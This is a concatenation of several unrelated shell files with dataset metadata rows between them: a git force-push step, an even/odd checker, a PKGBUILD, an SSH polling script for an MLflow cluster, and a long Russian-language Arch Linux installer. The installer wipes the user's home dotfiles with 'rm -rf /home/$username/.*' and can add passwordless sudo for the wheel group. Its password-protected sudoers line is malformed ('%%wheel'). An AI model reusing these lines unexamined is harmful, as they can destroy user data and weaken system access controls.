git config user.name "Alex Jiang"
git add --all
git commit -a -m "Travis #$TRAVIS_BUILD_NUMBER"
git push --force origin gh-pages
| true
|
92d06a7d0dade5e6b32402cc66603a93f3fe4eb8
|
Shell
|
abhirupray14/Shell_Programs
|
/CheckEven.sh
|
UTF-8
| 158
| 3.4375
| 3
|
[] |
no_license
|
# Read a number from the user and report whether it is even or odd.
# (The original prompt contained literal curly “smart quotes” pasted from a
# word processor, which were printed as part of the message — fixed.)
echo "Enter any value for n:"
read -r n
# remainder of n / 2; $(( )) replaces the legacy external 'expr' call,
# which also failed with a syntax error on empty input
a=$(( n % 2 ))
if [ "$a" -eq 0 ]
then
echo Given number $n is even
else
echo Given number $n is odd
fi
| true
|
f1b541eeca89bee4d5ab1f18a2cde5ac501c499b
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/sentaku/PKGBUILD
|
UTF-8
| 574
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Kyle MacLeod <aur.kmac5@recursor.net>
# AUR package for sentaku, a shell selection-window utility.
pkgname=sentaku
pkgver=0.5.5
pkgrel=1
pkgdesc="Utilily to make sentaku (selection) window with shell command."
arch=('any')
url="https://github.com/rcmdnk/sentaku"
license=('MIT')
depends=()
source=("https://github.com/rcmdnk/sentaku/archive/v${pkgver}.zip")
md5sums=('70b68552ce0c0d8277eea6be1f2c880d')
package() {
# install the main executable, then the bundled helper scripts
cd "${srcdir}/${pkgname}-${pkgver}/bin"
install -D -m755 "./$pkgname" "$pkgdir/usr/bin/$pkgname"
install -d "$pkgdir/usr/share/sentaku"
# NOTE(review): 'ddv' does not look like a file that exists in bin/ — it may
# be a stray token; verify this install line against the upstream archive.
install -D -m755 ddv *.sh "$pkgdir/usr/share/sentaku"
}
# vim:set ts=2 sw=2 et:
| true
|
6dbb8b1b1efebc0da6870cdb713fa6664ba9a9ab
|
Shell
|
ozgurgul/hcp-demo-env-aws-terraform
|
/bin/experimental/minio_wait_for_mlflow_configured_state.sh
|
UTF-8
| 1,264
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Wait (up to ~30 minutes) until the MLflow KubeDirector cluster in the given
# tenant reaches state 'configured', polling from the remote RDP host.
# Usage: $0 TENANT_ID MLFLOW_KD_CLUSTERNAME
# mirror all output of this script into a per-script log file
exec > >(tee -i generated/log-$(basename $0).txt)
exec 2>&1
set -e
if [[ -z $1 || -z $2 ]]; then
echo Usage: $0 TENANT_ID MLFLOW_KD_CLUSTERNAME
exit 1
fi
set -u
echo "Running script: $0 $@"
./scripts/check_prerequisites.sh
# provides LOCAL_SSH_PRV_KEY_PATH and RDP_PUB_IP used below
source ./scripts/variables.sh
export TENANT_ID=$1
export MLFLOW_CLUSTER_NAME=$2
# Run the polling loop on the RDP host. Inside the heredoc, \$-escaped
# variables are evaluated remotely; unescaped ones ($TENANT_ID,
# $MLFLOW_CLUSTER_NAME) are expanded locally before the script is sent.
ssh -q -o StrictHostKeyChecking=no -i "${LOCAL_SSH_PRV_KEY_PATH}" -T ubuntu@${RDP_PUB_IP} <<-EOF1
set -eu
set -o pipefail
export CLUSTER_ID=\$(hpecp tenant list --query "[?_links.self.href == '$TENANT_ID'] | [0] | [_links.k8scluster]" --output text)
export TENANT_NS=\$(hpecp tenant list --query "[?_links.self.href == '$TENANT_ID'] | [0] | [namespace]" --output text)
echo Waiting for Notebook to have state==configured
COUNTER=0
while [ \$COUNTER -lt 30 ];
do
STATE=\$(kubectl --kubeconfig <(hpecp k8scluster --id \$CLUSTER_ID admin-kube-config) \
get kubedirectorcluster -n \$TENANT_NS $MLFLOW_CLUSTER_NAME -o 'jsonpath={.status.state}')
echo STATE=\$STATE
[[ \$STATE == "configured" ]] && break
sleep 1m
let COUNTER=COUNTER+1
done
if [[ \$STATE != "configured" ]];
then
echo "State is not configured after 30 minutes. Raising an error."
exit 1
fi
EOF1
| true
|
719042ad51551471d66eabe1edbe0764b2a9785a
|
Shell
|
ordanax/archlinux-kde--script-install-uefi-nogrub-and-grub-install
|
/kde.sh
|
UTF-8
| 31,384
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
echo 'скрипт второй настройка системы в chroot '
timedatectl set-ntp true
pacman -Syyu --noconfirm
read -p "Введите имя компьютера: " hostname
read -p "Введите имя пользователя: " username
echo 'Прописываем имя компьютера'
echo $hostname > /etc/hostname
echo ""
echo " Очистим папку конфигов, кеш, и скрытые каталоги в /home/$username от старой системы ? "
while
read -n1 -p "
1 - да
0 - нет: " i_rm # sends right after the keypress
echo ''
[[ "$i_rm" =~ [^10] ]]
do
:
done
if [[ $i_rm == 0 ]]; then
clear
echo " очистка пропущена "
elif [[ $i_rm == 1 ]]; then
rm -rf /home/$username/.*
clear
echo " очистка завершена "
fi
#####################################
echo " Настроим localtime "
while
read -n1 -p "
1 - Москва
2 - Минск
3 - Екатеринбург
4 - Киев
5 - Якутск
6 - Саратов
7- Новосибирск
0 - пропустить(если нет вашего варианта) : " wm_time
echo ''
[[ "$wm_time" =~ [^12345670] ]]
do
:
done
if [[ $wm_time == 1 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Moscow /etc/localtime
echo " Москва "
elif [[ $wm_time == 2 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Minsk /etc/localtime
echo "Минск"
elif [[ $wm_time == 3 ]]; then
ln -sf /usr/share/zoneinfo/Asia/Yekaterinburg /etc/localtime
echo " Екатеринбург "
elif [[ $wm_time == 4 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Kiev /etc/localtime
echo " Киев "
elif [[ $wm_time == 5 ]]; then
ln -sf /usr/share/zoneinfo/Asia/Yakutsk /etc/localtime
echo " Якутск "
elif [[ $wm_time == 6 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Saratov /etc/localtime
echo " Саратов "
elif [[ $wm_time == 7 ]]; then
ln -sf /usr/share/zoneinfo/Asia/Novosibirsk /etc/localtime
echo " Новосибирск "
elif [[ $wm_time == 0 ]]; then
clear
echo " этап пропущен "
fi
#####################################
echo "en_US.UTF-8 UTF-8" > /etc/locale.gen
echo "ru_RU.UTF-8 UTF-8" >> /etc/locale.gen
locale-gen
echo 'LANG="ru_RU.UTF-8"' > /etc/locale.conf
echo "KEYMAP=ru" >> /etc/vconsole.conf
echo "FONT=cyr-sun16" >> /etc/vconsole.conf
echo " Укажите пароль для "ROOT" "
passwd
echo 'Добавляем пароль для пользователя '$username' '
useradd -m -g users -G wheel -s /bin/bash $username
passwd $username
echo ""
echo " Я рекомендую не изменять зеркала во время установки, для уменьшения вероятности ошибок "
echo " Если не уверены в том что смена зеркал вамм необходима, тогда пропустите "
echo ""
echo 'Сменим зеркала на Россия\Беларусь для увеличения скорости загрузки пакетов?'
while
read -n1 -p "
1 - да
0 - нет: " zerkala # sends right after the keypress
echo ''
[[ "$zerkala" =~ [^10] ]]
do
:
done
if [[ $zerkala == 1 ]]; then
wget https://raw.githubusercontent.com/poruncov/archlinux-kde--script-install-uefi-nogrub-and-grub-install/master/zer
cat 'zer' > /etc/pacman.d/mirrorlist
rm zer
elif [[ $zerkala == 0 ]]; then
echo 'смена зеркал пропущена.'
fi
pacman -Syy
clear
lsblk -f
###########################################################################
echo ""
echo "Какой загрузчик установить UEFI(systemd) или Grub для legacy"
while
read -n1 -p "
1 - UEFI
2 - GRUB(legacy): " t_bootloader # sends right after the keypress
echo ''
[[ "$t_bootloader" =~ [^12] ]]
do
:
done
if [[ $t_bootloader == 1 ]]; then
bootctl install
echo ' default arch ' > /boot/loader/loader.conf
echo ' timeout 10 ' >> /boot/loader/loader.conf
echo ' editor 0' >> /boot/loader/loader.conf
echo ""
echo " Укажите тот радел который будет после перезагрузки, то есть например "
echo " при установке с флешки ваш hdd может быть sdb, а после перезагрузки sda "
echo " выше видно что sdbX напривмер примонтирован в /mnt, а после перезагрузки systemd будет искать корень на sdaX "
echo " если указать не правильный раздел система не загрузится "
echo " если у вас один hdd/ssd тогда это будет sda 99%"
echo ""
read -p "Укажите ROOT раздел для загрузчика(пример sda6,sdb3 ): " root
echo 'title Arch Linux' > /boot/loader/entries/arch.conf
echo 'linux /vmlinuz-linux' >> /boot/loader/entries/arch.conf
echo 'initrd /initramfs-linux.img' >> /boot/loader/entries/arch.conf
echo options root=/dev/$root rw >> /boot/loader/entries/arch.conf
cd /home/$username
git clone https://aur.archlinux.org/systemd-boot-pacman-hook.git
chown -R $username:users /home/$username/systemd-boot-pacman-hook
chown -R $username:users /home/$username/systemd-boot-pacman-hook/PKGBUILD
cd /home/$username/systemd-boot-pacman-hook
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/systemd-boot-pacman-hook
cd /home/$username
clear
elif [[ $t_bootloader == 2 ]]; then
pacman -S grub grub-customizer os-prober
read -p "Укажите диск куда установить GRUB (sda/sdb): " x_boot
grub-install /dev/$x_boot
grub-mkconfig -o /boot/grub/grub.cfg
fi
mkinitcpio -p linux
##########
echo ""
echo " Настроим Sudo? "
while
read -n1 -p "
1 - с паролем
2 - без пароля
0 - Sudo не добавляем : " i_sudo # sends right after the keypress
echo ''
[[ "$i_sudo" =~ [^120] ]]
do
:
done
if [[ $i_sudo == 0 ]]; then
clear
echo " Добавление sudo пропущено"
elif [[ $i_sudo == 1 ]]; then
echo '%%wheel ALL=(ALL) ALL' >> /etc/sudoers
clear
echo " Sudo с запросом пароля установлено "
elif [[ $i_sudo == 2 ]]; then
echo '%wheel ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
clear
echo " Sudo nopassword добавлено "
fi
##########
echo ""
echo " Настроим multilib? "
while
read -n1 -p "
1 - да
0 - нет : " i_multilib # sends right after the keypress
echo ''
[[ "$i_multilib" =~ [^10] ]]
do
:
done
if [[ $i_multilib == 0 ]]; then
clear
echo " Добавление мультилиб репозитория пропущено"
elif [[ $i_multilib == 1 ]]; then
echo '[multilib]' >> /etc/pacman.conf
echo 'Include = /etc/pacman.d/mirrorlist' >> /etc/pacman.conf
clear
echo " Multilib репозиторий добавлен"
fi
#######################
pacman -Syy
pacman -Sy xorg-server xorg-drivers --noconfirm
pacman -Sy linux-headers networkmanager network-manager-applet ppp --noconfirm
pacman -Sy pulseaudio-bluetooth ark exfat-utils alsa-utils unzip ntfs-3g pulseaudio-equalizer-ladspa unrar lha --noconfirm
echo "#####################################################################"
echo ""
echo " Arch-wiki рекоендует для kde-sddm, а для xfce-lxdm "
echo ""
echo " Установим DE? "
while
read -n1 -p "
1 - KDE(Plasma)+sddm
2 - xfce+lxdm
3 - kde+lxdm
4 - xfce+sddm
0 - пропустить " x_de
echo ''
[[ "$x_de" =~ [^12340] ]]
do
:
done
if [[ $x_de == 0 ]]; then
echo 'уcтановка DE пропущена'
elif [[ $x_de == 1 ]]; then
pacman -S sddm sddm-kcm plasma-meta kdebase kwalletmanager latte-dock --noconfirm
pacman -R konqueror --noconfirm
systemctl enable sddm.service -f
clear
echo "Plasma KDE успешно установлена"
elif [[ $x_de == 2 ]]; then
pacman -S xfce4 xfce4-goodies lxdm --noconfirm
systemctl enable lxdm
clear
echo "Xfce успешно установлено"
elif [[ $x_de == 3 ]]; then
pacman -S plasma-meta kdebase kwalletmanager latte-dock lxdm --noconfirm
pacman -R konqueror --noconfirm
systemctl enable lxdm
clear
echo "Plasma KDE успешно установлена"
elif [[ $x_de == 4 ]]; then
pacman -S xfce4 xfce4-goodies sddm sddm-kcm --noconfirm
systemctl enable sddm.service -f
clear
echo "Xfce успешно установлено"
fi
echo "#####################################################################"
echo ""
echo " Установка дополнительных программ "
echo ""
echo "
flameshot
filezilla
htop
gparted
neofetch
screenfetch
gwenview
steam steam-native-runtime
spectacle vlc telegram-desktop "
echo ""
echo " установим все или на ваш выбор? "
while
read -n1 -p "
1 - все
2 - на выбор
0 - пропустить " i_prog # sends right after the keypress
echo ''
[[ "$i_prog" =~ [^120] ]]
do
:
done
if [[ $i_prog == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_prog == 1 ]]; then
pacman -S flameshot filezilla htop gparted neofetch screenfetch gwenview steam steam-native-runtime spectacle vlc gvfs-mtp gvfs-afc telegram-desktop --noconfirm
clear
echo " установка завершена "
elif [[ $i_prog == 2 ]]; then
echo "#############################################################################"
echo ""
echo " Будете ли вы подключать Android или Iphone к ПК через USB? "
while
read -n1 -p "
1 - Android
2 - Iphone
3 - оба варианта
0 - пропустить: " i_telephone # sends right after the keypress
echo ''
[[ "$i_telephone" =~ [^1230] ]]
do
:
done
if [[ $i_telephone == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_telephone == 1 ]]; then
pacman -S gvfs-mtp --noconfirm
clear
echo " установка gvfs-mtp завершена "
elif [[ $i_telephone == 2 ]]; then
pacman -S gvfs-afc --noconfirm
clear
echo " установка gvfs-afc завершена "
elif [[ $i_telephone == 3 ]]; then
pacman -S gvfs-afc gvfs-mtp --noconfirm
clear
echo " установка gvfs-afc gvfs-mtp завершена "
fi
echo "#############################################################################"
echo ""
echo " htop--диспетер задач для linux "
while
read -n1 -p "
1 - да
0 - нет: " i_htop # sends right after the keypress
echo ''
[[ "$i_htop" =~ [^10] ]]
do
:
done
if [[ $i_htop == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_htop == 1 ]]; then
pacman -S htop --noconfirm
clear
echo " установка htop завершена "
fi
############# filezilla ###############
echo "#############################################################################"
echo ""
echo " Filezilla - графический клиент для работы с FTP/SFTP "
while
read -n1 -p "
1 - да
0 - нет: " i_filezilla # sends right after the keypress
echo ''
[[ "$i_filezilla" =~ [^10] ]]
do
:
done
if [[ $i_filezilla == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_filezilla == 1 ]]; then
pacman -S filezilla --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " gwenview - программа для просмотра изображений "
while
read -n1 -p "
1 - да
0 - нет: " i_gwenview # sends right after the keypress
echo ''
[[ "$i_gwenview" =~ [^10] ]]
do
:
done
if [[ $i_gwenview == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_gwenview == 1 ]]; then
pacman -S gwenview --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " Steam - магазин игр "
while
read -n1 -p "
1 - да
0 - нет: " i_steam # sends right after the keypress
echo ''
[[ "$i_steam" =~ [^10] ]]
do
:
done
if [[ $i_steam == 0 ]]; then
clear
echo " Усттанока пропущена "
elif [[ $i_steam == 1 ]]; then
pacman -S steam steam-native-runtime --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " neofetch - вывод данных о системе с лого в консоли "
while
read -n1 -p "
1 - да
0 - нет: " i_neofetch # sends right after the keypress
echo ''
[[ "$i_neofetch" =~ [^10] ]]
do
:
done
if [[ $i_neofetch == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_neofetch == 1 ]]; then
pacman -S neofetch --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " screenfetch - вывод данных о системе с лого в консоли( аналог neofetch ) "
while
read -n1 -p "
1 - да
0 - нет: " i_screenfetch # sends right after the keypress
echo ''
[[ "$i_screenfetch" =~ [^10] ]]
do
:
done
if [[ $i_screenfetch == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_screenfetch == 1 ]]; then
pacman -S screenfetch --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " vlc - проигрыватель мультимедиа ) "
while
read -n1 -p "
1 - да
0 - нет: " i_vlc # sends right after the keypress
echo ''
[[ "$i_vlc" =~ [^10] ]]
do
:
done
if [[ $i_vlc == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_vlc == 1 ]]; then
pacman -S vlc --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " gparted - программа для работы с разделоми sdd/hdd ) "
while
read -n1 -p "
1 - да
0 - нет: " i_gparted # sends right after the keypress
echo ''
[[ "$i_gparted" =~ [^10] ]]
do
:
done
if [[ $i_gparted == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_gparted == 1 ]]; then
pacman -S gparted --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " telegram - мессенджер ) "
while
read -n1 -p "
1 - да
0 - нет: " i_telegram # sends right after the keypress
echo ''
[[ "$i_telegram" =~ [^10] ]]
do
:
done
if [[ $i_telegram == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_telegram == 1 ]]; then
pacman -S telegram-desktop --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " установим программу для создания скриншотов? "
echo ""
echo " spectacle(интегрируеться в рабочий стол Plasma(kde)) и flameshot(универсальна, хорошо работает в KDE и Xfce) "
while
read -n1 -p "
1 - spectacle
2 -flameshot
3 - оба варианта
0 - пропустить: " i_screen # sends right after the keypress
echo ''
[[ "$i_screen" =~ [^1230] ]]
do
:
done
if [[ $i_screen == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_screen == 1 ]]; then
pacman -S spectacle --noconfirm
clear
echo " Установка завершена "
elif [[ $i_screen == 2 ]]; then
pacman -S flameshot --noconfirm
clear
echo " Установка завершена "
elif [[ $i_screen == 3 ]]; then
pacman -S spectacle flameshot --noconfirm
clear
echo " установка завершена "
fi
fi
###############################################################################
pacman -S ttf-arphic-ukai git ttf-liberation ttf-dejavu ttf-arphic-uming ttf-fireflysung ttf-sazanami --noconfirm
clear
echo ""
echo " Уставливаем ssh(клиент) для удаленного доступа ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_ssh # sends right after the keypress
echo ''
[[ "$t_ssh" =~ [^10] ]]
do
:
done
if [[ $t_ssh == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_ssh == 1 ]]; then
pacman -S openssh --noconfirm
clear
fi
echo ""
echo " Вкличим в автозагрузку ssh(server) для удаленного доступа к этому пк ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_ssh1 # sends right after the keypress
echo ''
[[ "$t_ssh1" =~ [^10] ]]
do
:
done
if [[ $t_ssh1 == 0 ]]; then
clear
echo ' сервис sshd не вкючен'
elif [[ $t_ssh1 == 1 ]]; then
systemctl enable sshd.service
clear
fi
echo "#############################################################################"
echo "###### ZSH #####"
echo ""
echo " установим zsh(такой же как и в установочном образе Archlinux) или оставим Bash по умолчанию ? "
echo ""
echo "при необходимости можно будет установить другую оболочку в уже установленной системе "
# Prompt loop: accept a single keypress of 1 (install zsh) or 2 (keep bash).
while
read -n1 -p "
1 - установить zsh
2 - оставим bash по умолчанию " x_shell
echo ''
[[ "$x_shell" =~ [^12] ]]
do
:
done
if [[ $x_shell == 1 ]]; then
    clear
    # Install zsh with syntax highlighting and the grml config, and enable
    # both system-wide via /etc/zsh/zshrc.
    pacman -S zsh zsh-syntax-highlighting grml-zsh-config --noconfirm
    echo 'source /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh' >> /etc/zsh/zshrc
    echo 'prompt adam2' >> /etc/zsh/zshrc
    echo " сменим оболочку пользователя с bash на zsh? "
    while
    read -n1 -p "
1 - да
0 - нет: " t_shell # sends right after the keypress
    echo ''
    [[ "$t_shell" =~ [^10] ]]
    do
    :
    done
    if [[ $t_shell == 0 ]]; then
        clear
        echo 'пользоватльская обочка не изменена ( по умолчанию BASH )'
    elif [[ $t_shell == 1 ]]; then
        # Switch the login shell for both root and the newly created user.
        chsh -s /bin/zsh
        chsh -s /bin/zsh $username
        clear
        echo " при первом запуске консоли(терминала) нажмите "0" "
        echo " оболочка изменена с bash на zsh "
    fi
else
    # BUG FIX: this branch used to test "x_shell == 0", a value the
    # validation loop above never accepts ([^12] only lets 1 or 2 through),
    # so choosing "2" produced no feedback at all. Anything other than 1
    # now explicitly means "keep bash".
    clear
    echo ' оболочка не изменена, по умолчанию bash! '
fi
echo "#############################################################################"
systemctl enable NetworkManager.service
systemctl enable bluetooth.service
echo ""
echo " Добавим dhcpcd в автозагрузку( для проводного интернета, который получает настройки от роутера ) ? "
echo ""
echo "при необходиости это можно будет сделать уже в установленной системе "
while
read -n1 -p "
1 - включить dhcpcd
0 - не включать dhcpcd " x_dhcpcd
echo ''
[[ "$x_dhcpcd" =~ [^10] ]]
do
:
done
if [[ $x_dhcpcd == 0 ]]; then
echo ' dhcpcd не включен в автозагрузку, при необходиости это можно будет сделать уже в установленной системе '
elif [[ $x_dhcpcd == 1 ]]; then
systemctl enable dhcpcd.service
clear
echo "Dhcpcd успешно добавлен в автозагрузку"
fi
pacman -Sy --noconfirm
##############################################
echo ""
echo ""
echo "##################################################################################"
echo "################### <<<< установка программ из AUR >>> ######################"
echo "##################################################################################"
echo ""
echo " каждую из программ можно будет пропустить! "
echo ""
###########################################################################
echo " Уставливаем aur-helper ( pikaur(идет как зависимость для octopi) или yay ) ? "
while
read -n1 -p "
1 - pikaur
2 - yay
0 - пропустить : " in_aur_help # sends right after the keypress
echo ''
[[ "$in_aur_help" =~ [^120] ]]
do
:
done
if [[ $in_aur_help == 0 ]]; then
echo ' установка пропущена'
elif [[ $in_aur_help == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/pikaur.git
chown -R $username:users /home/$username/pikaur
chown -R $username:users /home/$username/pikaur/PKGBUILD
cd /home/$username/pikaur
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/pikaur
elif [[ $in_aur_help == 2 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/yay.git
chown -R $username:users /home/$username/yay
chown -R $username:users /home/$username/yay/PKGBUILD
cd /home/$username/yay
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/yay
clear
fi
echo "################################################################"
echo ""
# Browser choice: 1 = Google Chrome (built from the AUR), 2 = Firefox from
# the official repos, 3 = both, 0 = skip.
echo " Устанавливаем браузер? : "
while
read -n1 -p "
1 - google-chrome
2 - firefox(russian)
3 - установить оба
0 - пропустить: " g_chrome # sends right after the keypress
echo ''
[[ "$g_chrome" =~ [^1230] ]]
do
:
done
if [[ $g_chrome == 0 ]]; then
echo ' установка браузера пропущена после установки системы вы сможете установить браузер на свой усмотрение!!!!'
elif [[ $g_chrome == 1 ]]; then
# Standard AUR build pattern used throughout this script: clone as root,
# chown the checkout to the unprivileged user, then run makepkg as that
# user (makepkg refuses to run as root), and clean up the build directory.
cd /home/$username
git clone https://aur.archlinux.org/google-chrome.git
chown -R $username:users /home/$username/google-chrome
chown -R $username:users /home/$username/google-chrome/PKGBUILD
cd /home/$username/google-chrome
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/google-chrome
clear
elif [[ $g_chrome == 2 ]]; then
# NOTE(review): firefox-developer-edition-i18n-ru is the locale pack for
# Firefox *Developer Edition*; for the plain "firefox" package the Russian
# locale is firefox-i18n-ru — confirm which pairing is intended.
pacman -S firefox firefox-developer-edition-i18n-ru --noconfirm
clear
elif [[ $g_chrome == 3 ]]; then
pacman -S firefox firefox-developer-edition-i18n-ru --noconfirm
cd /home/$username
git clone https://aur.archlinux.org/google-chrome.git
chown -R $username:users /home/$username/google-chrome
chown -R $username:users /home/$username/google-chrome/PKGBUILD
cd /home/$username/google-chrome
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/google-chrome
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем teamviewer для удаленного доступа ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_teamviewer # sends right after the keypress
echo ''
[[ "$t_teamviewer" =~ [^10] ]]
do
:
done
if [[ $t_teamviewer == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_teamviewer == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/teamviewer.git
chown -R $username:users /home/$username/teamviewer
chown -R $username:users /home/$username/teamviewer/PKGBUILD
cd /home/$username/teamviewer
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/teamviewer
systemctl enable teamviewerd.service
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем vk-messenger ? : "
while
read -n1 -p "
1 - да,
0 - нет: " t_vk # sends right after the keypress
echo ''
[[ "$t_vk" =~ [^10] ]]
do
:
done
if [[ $t_vk == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_vk == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/vk-messenger.git
chown -R $username:users /home/$username/vk-messenger
chown -R $username:users /home/$username/vk-messenger/PKGBUILD
cd /home/$username/vk-messenger
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/vk-messenger
clear
fi
echo "################################################################"
########
echo " Уставливаем woeusb (Программа для записи Windows.iso на USB-накопитель) ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_woeusb # sends right after the keypress
echo ''
[[ "$t_woeusb" =~ [^10] ]]
do
:
done
if [[ $t_woeusb == 0 ]]; then
clear
echo 'уcтановка пропущена'
elif [[ $t_woeusb == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/woeusb.git
chown -R $username:users /home/$username/woeusb
chown -R $username:users /home/$username/woeusb/PKGBUILD
cd /home/$username/woeusb
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/woeusb
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем alsi (альтернатива neofetch и screenfetch) ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_alsi # sends right after the keypress
echo ''
[[ "$t_alsi" =~ [^10] ]]
do
:
done
if [[ $t_alsi == 0 ]]; then
clear
echo 'уcтановка пропущена'
elif [[ $t_alsi == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/alsi.git
chown -R $username:users /home/$username/alsi
chown -R $username:users /home/$username/alsi/PKGBUILD
cd /home/$username/alsi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/alsi
clear
fi
echo "################################################################"
echo ""
echo " Устанавливаем inxi ( подробная информация о системе ) ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_inxi # sends right after the keypress
echo ''
[[ "$t_inxi" =~ [^10] ]]
do
:
done
if [[ $t_inxi == 0 ]]; then
clear
echo 'уcтановка пропущена'
elif [[ $t_inxi == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/inxi.git
chown -R $username:users /home/$username/inxi
chown -R $username:users /home/$username/inxi/PKGBUILD
cd /home/$username/inxi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/inxi
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем графический менеджер пакетов для Archlinux ? : "
while
read -n1 -p "
1 - octopi
2 - pamac-aur
0 - пропустить : " t_aur # sends right after the keypress
echo ''
[[ "$t_aur" =~ [^120] ]]
do
:
done
if [[ $t_aur == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_aur == 1 ]]; then
echo " Был ли выбран ранее pikaur ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_picaur # sends right after the keypress
echo ''
[[ "$t_picaur" =~ [^10] ]]
do
:
done
if [[ $t_picaur == 0 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/pikaur.git
chown -R $username:users /home/$username/pikaur
chown -R $username:users /home/$username/pikaur/PKGBUILD
cd /home/$username/pikaur
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/pikaur
#####
cd /home/$username
git clone https://aur.archlinux.org/alpm_octopi_utils.git
chown -R $username:users /home/$username/alpm_octopi_utils
chown -R $username:users /home/$username/alpm_octopi_utils/PKGBUILD
cd /home/$username/alpm_octopi_utils
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/alpm_octopi_utils
################
cd /home/$username
git clone https://aur.archlinux.org/octopi.git
chown -R $username:users /home/$username/octopi
chown -R $username:users /home/$username/octopi/PKGBUILD
cd /home/$username/octopi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/octopi
clear
echo " Octopi успешно установлен "
elif [[ $t_picaur == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/alpm_octopi_utils.git
chown -R $username:users /home/$username/alpm_octopi_utils
chown -R $username:users /home/$username/alpm_octopi_utils/PKGBUILD
cd /home/$username/alpm_octopi_utils
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/alpm_octopi_utils
################
cd /home/$username
git clone https://aur.archlinux.org/octopi.git
chown -R $username:users /home/$username/octopi
chown -R $username:users /home/$username/octopi/PKGBUILD
cd /home/$username/octopi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/octopi
clear
echo " Octopi успешно установлен "
fi
elif [[ $t_aur == 2 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/pamac-aur.git
chown -R $username:users /home/$username/pamac-aur
chown -R $username:users /home/$username/pamac-aur/PKGBUILD
cd /home/$username/pamac-aur
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/pamac-aur
clear
echo " Pamac-aur успешно установлен! "
fi
echo "#################### Установка пакетов завершена ############################################"
echo ""
echo "
Данный этап поможет исключить возможные ошибки при первом запуске системы
Фаил откроется через редактор !nano!"
echo ""
echo " Просмотрим//отредактируем /etc/fstab ?"
while
read -n1 -p "1 - да, 0 - нет: " vm_fstab # sends right after the keypress
echo ''
[[ "$vm_fstab" =~ [^10] ]]
do
:
done
if [[ $vm_fstab == 0 ]]; then
echo 'этап пропущен'
elif [[ $vm_fstab == 1 ]]; then
nano /etc/fstab
fi
clear
echo "################################################################"
echo ""
echo "Создаем папки музыка, видео и т.д. в дириктории пользователя?"
while
read -n1 -p "1 - да, 0 - нет: " vm_text # sends right after the keypress
echo ''
[[ "$vm_text" =~ [^10] ]]
do
:
done
if [[ $vm_text == 0 ]]; then
echo 'этап пропущен'
elif [[ $vm_text == 1 ]]; then
mkdir /home/$username/{Downloads,Music,Pictures,Videos,Documents,time}
